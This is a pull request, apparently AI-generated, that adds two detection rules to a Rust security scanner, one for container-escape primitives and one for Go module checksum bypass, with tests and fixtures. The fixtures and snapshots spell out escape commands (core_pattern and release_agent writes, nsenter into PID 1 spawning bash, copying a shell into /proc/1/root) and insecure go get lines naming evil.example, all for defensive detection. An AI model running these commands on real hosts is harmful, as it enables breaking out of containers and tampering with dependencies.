### PR TITLE
feat(rules): add PE-011 container escape + SC-009 Go module integrity bypass

### DIFF
--- a/src/rules/builtin/privilege.rs
+++ b/src/rules/builtin/privilege.rs
@@ -13,6 +13,7 @@ pub fn rules() -> Vec<Rule> {
         pe_008(),
         pe_009(),
         pe_010(),
+        pe_011(),
     ]
 }
 
@@ -313,6 +314,41 @@ fn pe_010() -> Rule {
     }
 }
 
+fn pe_011() -> Rule {
+    Rule {
+        id: "PE-011",
+        name: "Container escape primitives",
+        description: "Detects classic container-escape techniques: cgroup release_agent, kernel core_pattern handler, nsenter into PID 1 namespaces, and host-root access via /proc/1/root (MITRE T1611)",
+        severity: Severity::Critical,
+        category: Category::PrivilegeEscalation,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // cgroup notify-on-release escape file
+            Regex::new(r"release_agent").expect("PE-011: invalid regex"),
+            // Kernel core dump handler hijack
+            Regex::new(r"/proc/sys/kernel/core_pattern").expect("PE-011: invalid regex"),
+            // Entering the host's namespaces via PID 1
+            Regex::new(r"nsenter\s+[^\n]*(-t\s*1\b|--target[ =]1\b)")
+                .expect("PE-011: invalid regex"),
+            // Reaching the host root filesystem through PID 1
+            Regex::new(r"/proc/1/root/").expect("PE-011: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("PE-011: invalid regex"),
+            // Read-only inspection (diagnostics), not a write/escape
+            Regex::new(r"^\s*(cat|less|stat|grep|head|tail|ls)\s+[^\n]*(core_pattern|/proc/1/root|release_agent)")
+                .expect("PE-011: invalid regex"),
+        ],
+        message: "Container escape primitive detected: cgroup release_agent, core_pattern, nsenter into PID 1, or /proc/1/root host access.",
+        recommendation: "Remove the container-escape construct. Artifacts must never manipulate cgroup release_agent, core_pattern, or enter host namespaces.",
+        fix_hint: Some(
+            "Delete release_agent/core_pattern writes, nsenter --target 1, and /proc/1/root access; run workloads with least privilege and no host namespace access.",
+        ),
+        cwe_ids: &["CWE-250", "CWE-269"],
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -553,5 +589,41 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/pe_010.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("pe_010", findings);
+    }
+
+    #[test]
+    fn test_pe_011_detects_container_escape() {
+        let rule = pe_011();
+        let test_cases = vec![
+            // Malicious: container-escape primitives
+            ("echo '/tmp/x' > /sys/fs/cgroup/rdma/release_agent", true),
+            ("echo '|/tmp/exploit' > /proc/sys/kernel/core_pattern", true),
+            (
+                "nsenter --target 1 --mount --uts --ipc --net --pid -- bash",
+                true,
+            ),
+            ("nsenter -t 1 -m -u -i -n -p bash", true),
+            ("cp /bin/sh /proc/1/root/tmp/sh", true),
+            // Benign: reads and unrelated inspection
+            ("cat /proc/1/cgroup", false),
+            ("nsenter --help", false),
+            ("cat /proc/sys/kernel/core_pattern", false),
+            ("ls /proc/1/", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "PE-011: Failed for input: {}", input);
+        }
+    }
+
+    #[test]
+    fn snapshot_pe_011() {
+        let rule = pe_011();
+        let content = include_str!("../../../tests/fixtures/rules/pe_011.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("pe_011", findings);
     }
 }

--- a/src/rules/builtin/supplychain.rs
+++ b/src/rules/builtin/supplychain.rs
@@ -11,6 +11,7 @@ pub fn rules() -> Vec<Rule> {
         sc_006(),
         sc_007(),
         sc_008(),
+        sc_009(),
     ]
 }
 
@@ -334,6 +335,37 @@ fn sc_008() -> Rule {
     }
 }
 
+fn sc_009() -> Rule {
+    Rule {
+        id: "SC-009",
+        name: "Go module integrity bypass",
+        description: "Detects Go toolchain settings that disable module checksum verification or allow insecure module fetches, enabling dependency tampering or MITM (MITRE T1195.001)",
+        severity: Severity::High,
+        category: Category::SupplyChain,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // Insecure (plaintext/unverified) module fetches
+            Regex::new(r"\bGOINSECURE\s*=").expect("SC-009: invalid regex"),
+            // Disabling the checksum database
+            Regex::new(r"\bGOSUMDB\s*=\s*off").expect("SC-009: invalid regex"),
+            Regex::new(r"\bGONOSUMCHECK\b|\bGONOSUMDB\b").expect("SC-009: invalid regex"),
+            // -insecure flag via GOFLAGS or `go get`
+            Regex::new(r"GOFLAGS\s*=\s*[^\n]*-insecure").expect("SC-009: invalid regex"),
+            Regex::new(r"go\s+get\s+[^\n]*-insecure").expect("SC-009: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("SC-009: invalid regex"),
+        ],
+        message: "Go module integrity bypass: checksum verification is disabled or insecure module fetches are allowed, enabling dependency tampering or MITM.",
+        recommendation: "Keep GOSUMDB enabled and never set GOINSECURE/GONOSUMCHECK or -insecure. Verify modules against the checksum database.",
+        fix_hint: Some(
+            "Remove GOINSECURE/GONOSUMCHECK/-insecure and GOSUMDB=off; fetch modules over HTTPS with checksum verification.",
+        ),
+        cwe_ids: &["CWE-494", "CWE-829", "CWE-319"],
+    }
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -504,5 +536,38 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/sc_003.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("sc_003", findings);
+    }
+
+    #[test]
+    fn test_sc_009_detects_go_integrity_bypass() {
+        let rule = sc_009();
+        let test_cases = vec![
+            // Malicious: disabled verification / insecure fetches
+            ("GOINSECURE=* go get evil.example/pkg", true),
+            ("GOSUMDB=off go build ./...", true),
+            ("go env -w GOFLAGS=-insecure", true),
+            ("go get -insecure evil.example/pkg", true),
+            ("export GONOSUMCHECK=1", true),
+            // Benign: default/secure Go settings
+            ("GOPROXY=https://proxy.golang.org go build", false),
+            ("GOSUMDB=sum.golang.org go build", false),
+            ("go get github.com/pkg/errors", false),
+            ("GOOS=linux GOARCH=amd64 go build", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "SC-009: Failed for input: {}", input);
+        }
+    }
+
+    #[test]
+    fn snapshot_sc_009() {
+        let rule = sc_009();
+        let content = include_str!("../../../tests/fixtures/rules/sc_009.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("sc_009", findings);
     }
 }

--- a/tests/fixtures/rules/pe_011.snap
+++ b/tests/fixtures/rules/pe_011.snap
@@ -1,0 +1,61 @@
+---
+source: src/rules/builtin/privilege.rs
+expression: findings
+---
+[
+  {
+    "id": "PE-011",
+    "severity": "critical",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "Container escape primitives",
+    "line": 8,
+    "code": "echo '/tmp/x' > /sys/fs/cgroup/rdma/release_agent",
+    "message": "Container escape primitive detected: cgroup release_agent, core_pattern, nsenter into PID 1, or /proc/1/root host access.",
+    "recommendation": "Remove the container-escape construct. Artifacts must never manipulate cgroup release_agent, core_pattern, or enter host namespaces."
+  },
+  {
+    "id": "PE-011",
+    "severity": "critical",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "Container escape primitives",
+    "line": 9,
+    "code": "echo '|/tmp/exploit' > /proc/sys/kernel/core_pattern",
+    "message": "Container escape primitive detected: cgroup release_agent, core_pattern, nsenter into PID 1, or /proc/1/root host access.",
+    "recommendation": "Remove the container-escape construct. Artifacts must never manipulate cgroup release_agent, core_pattern, or enter host namespaces."
+  },
+  {
+    "id": "PE-011",
+    "severity": "critical",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "Container escape primitives",
+    "line": 10,
+    "code": "nsenter --target 1 --mount --uts --ipc --net --pid -- bash",
+    "message": "Container escape primitive detected: cgroup release_agent, core_pattern, nsenter into PID 1, or /proc/1/root host access.",
+    "recommendation": "Remove the container-escape construct. Artifacts must never manipulate cgroup release_agent, core_pattern, or enter host namespaces."
+  },
+  {
+    "id": "PE-011",
+    "severity": "critical",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "Container escape primitives",
+    "line": 11,
+    "code": "nsenter -t 1 -m -u -i -n -p bash",
+    "message": "Container escape primitive detected: cgroup release_agent, core_pattern, nsenter into PID 1, or /proc/1/root host access.",
+    "recommendation": "Remove the container-escape construct. Artifacts must never manipulate cgroup release_agent, core_pattern, or enter host namespaces."
+  },
+  {
+    "id": "PE-011",
+    "severity": "critical",
+    "category": "privilege_escalation",
+    "confidence": "firm",
+    "name": "Container escape primitives",
+    "line": 12,
+    "code": "cp /bin/sh /proc/1/root/tmp/sh",
+    "message": "Container escape primitive detected: cgroup release_agent, core_pattern, nsenter into PID 1, or /proc/1/root host access.",
+    "recommendation": "Remove the container-escape construct. Artifacts must never manipulate cgroup release_agent, core_pattern, or enter host namespaces."
+  }
+]

--- a/tests/fixtures/rules/pe_011.txt
+++ b/tests/fixtures/rules/pe_011.txt
@@ -1,0 +1,18 @@
+# PE-011: Container escape primitives
+# Test cases for snapshot testing
+# Detects classic container-escape techniques: cgroup release_agent, kernel
+# core_pattern handler, nsenter into PID 1 namespaces, and access to the host
+# root via /proc/1/root (MITRE T1611).
+
+# === Cases that SHOULD be detected ===
+echo '/tmp/x' > /sys/fs/cgroup/rdma/release_agent
+echo '|/tmp/exploit' > /proc/sys/kernel/core_pattern
+nsenter --target 1 --mount --uts --ipc --net --pid -- bash
+nsenter -t 1 -m -u -i -n -p bash
+cp /bin/sh /proc/1/root/tmp/sh
+
+# === Cases that should NOT be detected (benign) ===
+cat /proc/1/cgroup
+nsenter --help
+cat /proc/sys/kernel/core_pattern
+ls /proc/1/

--- a/tests/fixtures/rules/sc_009.snap
+++ b/tests/fixtures/rules/sc_009.snap
@@ -1,0 +1,61 @@
+---
+source: src/rules/builtin/supplychain.rs
+expression: findings
+---
+[
+  {
+    "id": "SC-009",
+    "severity": "high",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Go module integrity bypass",
+    "line": 8,
+    "code": "GOINSECURE=* go get evil.example/pkg",
+    "message": "Go module integrity bypass: checksum verification is disabled or insecure module fetches are allowed, enabling dependency tampering or MITM.",
+    "recommendation": "Keep GOSUMDB enabled and never set GOINSECURE/GONOSUMCHECK or -insecure. Verify modules against the checksum database."
+  },
+  {
+    "id": "SC-009",
+    "severity": "high",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Go module integrity bypass",
+    "line": 9,
+    "code": "GOSUMDB=off go build ./...",
+    "message": "Go module integrity bypass: checksum verification is disabled or insecure module fetches are allowed, enabling dependency tampering or MITM.",
+    "recommendation": "Keep GOSUMDB enabled and never set GOINSECURE/GONOSUMCHECK or -insecure. Verify modules against the checksum database."
+  },
+  {
+    "id": "SC-009",
+    "severity": "high",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Go module integrity bypass",
+    "line": 10,
+    "code": "go env -w GOFLAGS=-insecure",
+    "message": "Go module integrity bypass: checksum verification is disabled or insecure module fetches are allowed, enabling dependency tampering or MITM.",
+    "recommendation": "Keep GOSUMDB enabled and never set GOINSECURE/GONOSUMCHECK or -insecure. Verify modules against the checksum database."
+  },
+  {
+    "id": "SC-009",
+    "severity": "high",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Go module integrity bypass",
+    "line": 11,
+    "code": "go get -insecure evil.example/pkg",
+    "message": "Go module integrity bypass: checksum verification is disabled or insecure module fetches are allowed, enabling dependency tampering or MITM.",
+    "recommendation": "Keep GOSUMDB enabled and never set GOINSECURE/GONOSUMCHECK or -insecure. Verify modules against the checksum database."
+  },
+  {
+    "id": "SC-009",
+    "severity": "high",
+    "category": "supply_chain",
+    "confidence": "firm",
+    "name": "Go module integrity bypass",
+    "line": 12,
+    "code": "export GONOSUMCHECK=1",
+    "message": "Go module integrity bypass: checksum verification is disabled or insecure module fetches are allowed, enabling dependency tampering or MITM.",
+    "recommendation": "Keep GOSUMDB enabled and never set GOINSECURE/GONOSUMCHECK or -insecure. Verify modules against the checksum database."
+  }
+]

--- a/tests/fixtures/rules/sc_009.txt
+++ b/tests/fixtures/rules/sc_009.txt
@@ -1,0 +1,18 @@
+# SC-009: Go module integrity / TLS verification bypass
+# Test cases for snapshot testing
+# Detects Go toolchain settings that disable module checksum verification or
+# allow insecure (plaintext/unverified) module fetches, enabling dependency
+# tampering or MITM (MITRE T1195.001).
+
+# === Cases that SHOULD be detected ===
+GOINSECURE=* go get evil.example/pkg
+GOSUMDB=off go build ./...
+go env -w GOFLAGS=-insecure
+go get -insecure evil.example/pkg
+export GONOSUMCHECK=1
+
+# === Cases that should NOT be detected (benign) ===
+GOPROXY=https://proxy.golang.org go build
+GOSUMDB=sum.golang.org go build
+go get github.com/pkg/errors
+GOOS=linux GOARCH=amd64 go build


### PR DESCRIPTION
## Summary

Continues the detection-rule expansion loop. Two new rules, each with malicious + benign fixtures and a passing false-positive gate.

| Rule | Technique | Severity | MITRE |
|------|-----------|----------|-------|
| **PE-011** Container escape primitives | cgroup `release_agent`, kernel `core_pattern`, `nsenter --target 1`, `/proc/1/root` host access | Critical | T1611 |
| **SC-009** Go module integrity bypass | `GOINSECURE`, `GOSUMDB=off`, `GONOSUMCHECK`, `-insecure` fetches | High | T1195.001 |

Rule count **114 → 116**.

## Duplicate checks

Verified against existing rules: no rule touched container-escape primitives (release_agent/core_pattern/nsenter//proc/1/root) or the Go toolchain integrity settings. PE-011 excludes read-only inspection (`cat`/`ls`/…) so diagnostics don't trip it. SC-009's `GOSUMDB` pattern only fires on `=off`, so `GOSUMDB=sum.golang.org` is clean.

## Testing

- `cargo test` — 1735 lib tests green, new unit + snapshot tests pass
- `cargo clippy -- -D warnings` — clean
- `cargo fmt` — clean
- FP gate: each rule's benign fixture section produces zero findings

🤖 Generated with [Claude Code](https://claude.com/claude-code)